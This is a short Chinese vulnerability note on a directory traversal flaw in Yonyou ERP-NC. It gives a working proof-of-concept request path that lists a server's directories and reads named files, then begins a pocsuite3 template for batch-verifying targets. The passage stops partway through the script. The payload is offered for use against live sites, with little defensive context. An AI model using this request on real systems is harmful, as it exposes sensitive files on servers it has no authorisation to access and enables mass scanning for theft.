漏洞描述
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
fofa:
poc:/NCFindWeb?service=IPreAlertConfigService&filename=
在url处拼接poc后可以看到该站点的目录和文件
访问某个文件
/NCFindWeb?service=IPreAlertConfigService&filename=文件名
编写poc批量验证
这里使用的是pocsuite3的poc模板
# 调用pocsuite的一些API函数
from pocsuite3.api import Output, register_poc, requests, POCBase
# 继承POCBase类
c